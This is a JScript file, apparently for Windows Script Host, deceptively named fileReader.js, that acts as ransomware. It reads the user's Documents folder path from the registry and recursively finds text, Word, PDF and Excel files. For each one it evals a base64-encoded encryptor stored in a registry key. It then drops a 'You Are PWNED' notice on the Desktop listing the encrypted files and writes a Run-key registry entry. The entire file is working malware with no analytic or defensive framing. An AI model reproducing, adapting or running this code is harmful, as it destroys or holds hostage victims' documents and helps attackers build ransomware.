fileReader.js

1. //Base64 Decoder
2. var base64={};base64.PADCHAR='=';base64.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';base64.makeDOMException=function(){var e,tmp;try{return new DOMException(DOMException.INVALID_CHARACTER_ERR)}catch(tmp){var ex=new Error('DOM Exception 5');ex.code=ex.number=5;ex.name=ex.description='INVALID_CHARACTER_ERR';ex.toString=function(){return'Error: '+ex.name+': '+ex.message};return ex}};base64.getbyte64=function(s,i){var idx=base64.ALPHA.indexOf(s.charAt(i));if(idx===-1){throw base64.makeDOMException();}return idx};base64.decode=function(s){s=''+s;var getbyte64=base64.getbyte64;var pads,i,b10;var imax=s.length;if(imax===0){return s}if(imax%4!==0){throw base64.makeDOMException();}pads=0;if(s.charAt(imax-1)===base64.PADCHAR){pads=1;if(s.charAt(imax-2)===base64.PADCHAR){pads=2}imax-=4}var x=[];for(i=0;i<imax;i+=4){b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6)|getbyte64(s,i+3);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff,b10&0xff))}switch(pads){case 1:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff));break;case 2:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12);x.push(String.fromCharCode(b10>>16));break}return x.join('')};base64.getbyte=function(s,i){var x=s.charCodeAt(i);if(x>255){throw base64.makeDOMException();}return x};base64.encode=function(s){if(arguments.length!==1){throw new SyntaxError('Not enough arguments');}var padchar=base64.PADCHAR;var alpha=base64.ALPHA;var getbyte=base64.getbyte;var i,b10;var x=[];s=''+s;var imax=s.length-s.length%3;if(s.length===0){return s}for(i=0;i<imax;i+=3){b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8)|getbyte(s,i+2);x.push(alpha.charAt(b10>>18));x.push(alpha.charAt((b10>>12)&0x3F));x.push(alpha.charAt((b10>>6)&0x3f));x.push(alpha.charAt(b10&0x3f))}switch(s.length-imax){case 1:b10=getbyte(s,i)<<16;x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+padchar+padchar);break;case 2:b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8);x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+alpha.charAt((b10>>6)&0x3f)+padchar);break}return x.join('')};
3. //
4. var encryptor;
5. var personalFolderRegistryEntry = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Personal';
6. var encryptorRegistryEntry = 'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\e';
7. var fileNameToEncryptVar = 'fileNameToEncrypt';
8. var processFlagReg = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\PWNED';
9. var fso = new ActiveXObject('Scripting.FileSystemObject');
10. var fileExtList = {
11.     txt : 'txt',
12.     doc : 'doc',
13.     docx : 'docx',
14.     pdf : 'pdf',
15.     xls : 'xls',
16.     xlsx : 'xlsx',
17.     xlsm : 'xlsm'
18. };
19.  
20. var pwnedFileList = [];
21.  
22. function getFileExt(fileShortName) {
23.     if(fileShortName.indexOf('.') > -1) {
24.         return fileShortName.split('.').pop().toLowerCase();
25.     } else {
26.         return false;
27.     }
28. };
29.  
30. function isValidExt(fileShortName) {
31.     var ext = getFileExt(fileShortName);
32.     return ext ? fileExtList[ext] : false;
33. };
34.  
35. function getFiles(folderPath) {
36.     var folder = fso.GetFolder(folderPath);
37.     var files = folder.files;
38.     if(files.count > 0) {
39.     var fileList = new Enumerator(folder.files);
40.     for (; !fileList.atEnd(); fileList.moveNext()) {
41.             try {
42.                 if(isValidExt(fileList.item().ShortName)) {
43.                     pwnedFileList.push(fileList.item().path);
44.                     var evalString = 'var '+fileNameToEncryptVar+' = \''+fileList.item().path.replace(/\\/g, '\\\\')+'\';' + encryptor;
45.                     eval(evalString);
46.                 }
47.             } catch(err) {}
48.         }
49.     }
50. };
51.  
52. function getFolders(path) {
53.     var folder = fso.GetFolder(path);
54.     var subFolders = folder.SubFolders;
55.     if(subFolders.count > 0) {
56.         var folderList = new Enumerator(subFolders);
57.         for (; !folderList.atEnd(); folderList.moveNext()) {
58.             try {
59.                 getFolders(folderList.item());
60.             } catch(err) {}
61.         }
62.     }
63.     getFiles(path);
64. };
65.  
66. function finish() {
67.     if(pwnedFileList.length > 0) {
68.         var wsh = new ActiveXObject('WScript.Shell');
69.         var path = wsh.RegRead('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Desktop') + '\\You Are PWNED.html';
70.         var htmlBody = '<html><head><title>You have been PWNED !!!!!!!</title></head><body><h1>You Have been PWNED by ME !!!!</h1><h3>Following files are encrypted</h3><p>'+   pwnedFileList.join('<br/>') +'</p></body></html>';
71.         var a = fso.CreateTextFile(path, true);
72.         a.WriteLine(htmlBody);
73.         a.Close();
74.         wsh.RegWrite(processFlagReg, path, "REG_SZ");
75.     }
76. };
77.  
78. function isAleardyPwned() {
79.     try {
80.         var wsh = new ActiveXObject('WScript.Shell');
81.         var val = wsh.RegRead(processFlagReg);
82.         return val != '';
83.     } catch(err) {}
84.     return false;
85. };
86. function getDocumentFolder() {
87.     if(isAleardyPwned() == false) {
88.         var wsh = new ActiveXObject('WScript.Shell');
89.         var path = wsh.RegRead(personalFolderRegistryEntry);
90.         encryptor = base64.decode(wsh.RegRead(encryptorRegistryEntry));
91.         getFolders(path);
92.         finish();
93.     }
94. };
95. getDocumentFolder();